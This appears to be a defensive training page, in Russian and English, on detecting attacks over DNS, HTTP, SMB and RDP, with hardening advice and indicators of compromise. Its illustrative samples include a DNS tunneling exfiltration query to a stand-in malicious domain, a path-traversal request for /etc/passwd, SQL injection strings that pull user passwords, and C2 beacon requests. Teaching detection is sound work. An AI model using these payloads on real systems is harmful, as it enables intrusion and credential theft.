🌐 Network Protocols Deep Dive

Детальный анализ сетевых протоколов и их уязвимостей

🔍

DNS Tunneling Detection

Обнаружение скрытых каналов через DNS
Attack Vectors
DNS Data Exfiltration
Кража данных через DNS запросы путем кодирования в subdomain
DNS C2 Channel
Command & Control коммуникация через TXT записи
DNS Cache Poisoning
Подмена DNS ответов для перенаправления трафика
🛡️ Detection Methods
Anomaly Detection
Необычно длинные DNS имена, высокая энтропия в запросах
Volume Analysis
Большое количество DNS запросов к одному домену
Pattern Matching
Base64/Hex encoded данные в DNS queries
DNS Tunneling Example:
Query: ZXhhbXBsZS1kYXRhLWV4ZmlsdHJhdGlvbg==.tunnel.malicious.com
Type: TXT
Response: "COMMAND:download|TARGET:sensitive.db|KEY:aGFja2Vy"
Decoded: example-data-exfiltration → COMMAND execution
🔎 Indicators of Compromise
  • DNS запросы с subdomain длиной > 50 символов
  • Высокая частота запросов к новым subdomain
  • DNS ответы с необычно большими TXT записями
  • Запросы к доменам с высокой энтропией
  • Non-cached DNS queries в больших объемах
🛡️ Mitigation Strategies
  • Implement DNS filtering and reputation-based blocking
  • Monitor DNS query length and frequency thresholds
  • Use DNS sinkholes for known malicious domains
  • Enable DNSSEC to prevent cache poisoning
  • Analyze DNS logs with SIEM correlation rules
🌐

HTTP/HTTPS Analysis

Анализ веб-трафика и обнаружение аномалий
🎯 Common Attacks
SQL Injection
Внедрение SQL кода через HTTP параметры
XSS (Cross-Site Scripting)
Внедрение JavaScript в веб-страницы
Command Injection
Выполнение системных команд через веб
🔍 Analysis Points
  • User-Agent anomalies (tools, bots, scanners)
  • Unusual HTTP methods (PUT, DELETE, TRACE)
  • Large POST requests to unexpected endpoints
  • Missing or malformed headers
  • Suspicious URL patterns and encoding
Suspicious HTTP Request:
GET /admin/config.php?file=../../etc/passwd HTTP/1.1
Host: vulnerable.site.com
User-Agent: sqlmap/1.4.7#stable (http://sqlmap.org)
Cookie: session=admin' OR '1'='1
🛠️ Detection Tools
ModSecurity OWASP CRS Suricata Zeek WAF logs
📊 SSL/TLS Analysis
  • Self-signed certificates
  • Expired or mismatched certificates
  • Weak cipher suites (RC4, DES)
  • SSL/TLS version downgrades
  • Certificate pinning violations
🗂️

SMB Protocol Attacks

Server Message Block уязвимости и эксплойты
💀 Critical Vulnerabilities
EternalBlue (MS17-010)
Remote code execution через SMBv1, использован в WannaCry
SMBGhost (CVE-2020-0796)
Buffer overflow в SMBv3 compression
Pass-the-Hash
Использование NTLM хешей для аутентификации
🚨 Attack Indicators
  • SMBv1 traffic на порту 445
  • Массовое сканирование порта 445
  • Unusual SMB tree connects
  • Large data transfers via SMB
  • SMB relay attacks patterns
SMB Attack Pattern:
Source: 192.168.1.100:49285 → Dest: 192.168.1.50:445
SMB Protocol: Negotiate Protocol Request (SMBv1)
Tree Connect: \\\\TARGET\\IPC$
Named Pipe: \\pipe\\browser
🔒 SMB Security Hardening
  • Disable SMBv1 on all systems
  • Enable SMB signing and encryption
  • Restrict SMB traffic at network boundaries
  • Monitor for pass-the-hash indicators
  • Implement network segmentation for file shares
  • Regular patching for SMB vulnerabilities
🖥️

RDP Security

Remote Desktop Protocol защита и мониторинг
⚠️ Common RDP Attacks
BlueKeep (CVE-2019-0708)
Wormable RCE vulnerability in RDP
RDP Brute Force
Password attacks against exposed RDP
Man-in-the-Middle
RDP session hijacking and interception
📡 Detection Patterns
Failed Login Monitoring
Event ID 4625 with Logon Type 10
Unusual Source IPs
RDP from foreign countries or VPS providers
Off-hours Access
RDP sessions outside business hours
RDP Connection Analysis:
Protocol: MS-RDP (Port 3389)
X.224 Connection Request: Cookie: mstshash=administrator
Encryption: RC4 128-bit (Weak!)
Client Name: DESKTOP-MALWARE
🔐 Security Best Practices
  • Enable Network Level Authentication (NLA)
  • Use RD Gateway for internet access
  • Implement MFA for RDP access
  • Restrict RDP to specific IP ranges
  • Monitor and alert on RDP usage
  • Regular security updates
📊 Monitoring Metrics
  • Failed RDP authentications per hour
  • Successful RDP from new sources
  • RDP session duration anomalies
  • Concurrent RDP sessions per user
  • RDP traffic volume spikes
📦

Packet Analysis Examples

Практические примеры анализа сетевых пакетов
🎣 Phishing C2 Communication:
GET /api/bot/check-in?id=VICTIM-PC-001&status=ready HTTP/1.1
Host: updates-microsoft[.]tk
User-Agent: Mozilla/5.0 (Botnet v2.1)
X-Custom-Header: BASE64_ENCODED_SYSTEM_INFO
🦠 Malware Beacon:
POST /jquery/script.js HTTP/1.1
Host: 185.174.137[.]22
Content-Type: application/octet-stream
Cookie: SESSION=0x4D5A9000 (MZ header!)
Data: [Encrypted payload - 4096 bytes]
💉 SQL Injection Attempt:
GET /products.php?id=1' UNION SELECT username,password FROM users--
Host: vulnerable-shop.com
Referer: http://evil-scanner.com/sqli-test
🛠️ Analysis Tools
Wireshark tcpdump NetworkMiner Zeek (Bro) tshark ngrep
📚 Key Analysis Skills
  • Protocol structure understanding
  • Baseline vs anomaly recognition
  • Encryption/encoding detection
  • Timing analysis capabilities
  • Tool proficiency